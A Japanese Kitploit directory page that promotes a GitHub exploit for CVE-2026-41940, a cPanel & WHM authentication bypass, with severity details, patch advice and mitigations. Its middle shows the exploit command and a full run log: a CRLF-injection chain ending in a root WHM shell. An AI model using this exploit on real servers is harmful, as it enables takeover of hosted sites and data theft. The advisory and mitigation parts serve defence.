Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41940 — CVE-2026-41940 | Kitploit
ツール/GitHubGitHub/0xblackash/cve-2026-41940
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストコマンド&コントロールレッドチーミング
GitHub0xblackash/cve-2026-41940

CVE-2026-41940

CVE-2026-41940

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

⚠️ CVE-2026-41940 - cPanel & WHM 認証バイパス

ChatGPT 画像 2026年5月1日 08_27_37 PM
CVSS 9.8 Critical Actively Exploited

cPanel & WHM における重大な事前認証バイパス


📌 概要

CVE-2026-41940 は、cPanel & WHM および WP Squared に影響を与える重大な認証バイパスの脆弱性です。

認証されていないリモート攻撃者は、ログインを完全にバイパスして、サーバーへの完全な管理者 (root/WHM) アクセスを取得できます。

この欠陥は、パッチがリリースされる前に実際の環境で活発に悪用されていました。


🎯 深刻度

メトリクス値
CVSS 3.1 スコア9.8 (緊急)
CVSS 4.0 スコア9.3 (緊急)
攻撃ベクトルネットワーク
攻撃複雑度低
必要な権限不要
ユーザー操作不要

🛠️ 影響を受ける製品

  • cPanel & WHM — パッチ適用前の 11.40 以降の全バージョン
  • WP Squared — 136.1.7 より前のバージョン

公開時点で、約150万の cPanel インスタンスが潜在的に露出していました。


🔥 影響

悪用に成功すると、攻撃者は以下を実行できます:

  • WHM/root への完全なアクセスを取得
  • ホストされているすべてのウェブサイトとアカウントを乗っ取り
  • サーバー設定を変更
  • 機密データを外部に持ち出し
  • 永続的なバックドアを展開

✅ 成功時の出力例 (Eye Security のスクリーンショットで示したようなもの):

動作する場合は、次のような出力が表示されます:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2026-41940.py -u https://xx.xx.xx.xx:2087 --action shell                      
[sudo] password for kali: 


 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection
  4-stage: preauth → CRLF inject → propagate → verify → post-exploit
  Author : Ashraf Zaryouh / @0xBlackash

  Configuration:
   Targets  : 1
   Threads  : 10
   Timeout  : 15s
   Action   : shell

13:41:18 [SCAN] Starting 4-stage exploit chain... https://xx.xx.xx.xx:2087
13:41:19 [INFO] Canonical hostname discovered: server.xxxxxxx.xx
13:41:19 [INFO] Canonical: server.softsms.in
13:41:19 [STEP] Stage 1/4 — Minting preauth session...
13:41:20 [  OK] Stage1: preauth session = :W43DhFApxxxD8Jdw...
13:41:20 [STEP] Stage 2/4 — CRLF injection via Authorization header...
13:41:21 [  OK] Stage2: HTTP 307 → token=/cpsess263xxxx267
13:41:21 [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)...
13:41:22 [  OK] Stage3: HTTP 401 — do_token_denied gadget fired
13:41:22 [STEP] Stage 4/4 — Verifying WHM root access...
13:41:24 [INFO] Stage4: HTTP 200  {"version":"11.86.0.40"}
13:41:24 [PWND] CVE-2026-41940 CONFIRMED — WHM root access!  https://xx.xx.xx.xx:2087
13:41:24 [PWND]   Token    : /cpsess2634xxxx267
13:41:24 [PWND]   Session  : :W43DhFApxxxD8Jdw...
13:41:24 [PWND]   Version  : 11.86.0.40
13:41:24 [PWND]   API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
13:41:24 [ API] Running post-exploit action: shell

════════════════════════════════════════════════════════════
  WHM Shell — server.xxxxxxx.xx
  Version: CVE-2026-41940 | Auth: CRLF bypass
  Type 'help' for commands, 'exit' to quit
════════════════════════════════════════════════════════════

[email protected] ▶ id
13:41:28 [ API] gethostname → HTTP 500
  uid=0(root) gid=0(root) groups=0(root)
[email protected] ▶ exit
Exiting shell.

══════════════════════════════════════════════════════════════════════
  CVE-2026-41940.py — CVE-2026-41940 Scan Complete
  Time: 13.9s  ·  Targets: 1
──────────────────────────────────────────────────────────────────────

  ⚡ 1 VULNERABLE TARGET(S)

  Target   : https://xx.xx.xx.xx:2087
  Version  : 11.86.0.40
  Token    : /cpsess263xxxx267
  API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
  Session  : :W43DhFApxxxD8Jdw...
  Evidence : {"version":"11.86.0.40"}

══════════════════════════════════════════════════════════════════════


✅ 修正済みバージョン

2026年4月28日にパッチ適用済み

  • cPanel & WHM を最新ビルドに更新
  • WP Squared をバージョン 136.1.7 以降に更新

早急な対応を推奨


🛡️ 緩和策と保護

  • 直ちに最新バージョンへ更新
  • ポート 2082、2083、2086、2087 への公開アクセスをブロック
  • WAF ルール (Cloudflare、ModSecurity など) を有効化
  • 管理アクセスには IP 許可リストまたは VPN を使用

📚 参考情報

  • NVD - CVE-2026-41940
  • watchTowr Labs - 技術詳細
  • cPanel 公式セキュリティアドバイザリ
  • CISA KEV カタログ


セキュリティコミュニティのために ❤️ を込めて作成

最終更新: 2026年5月

ツールをダウンロード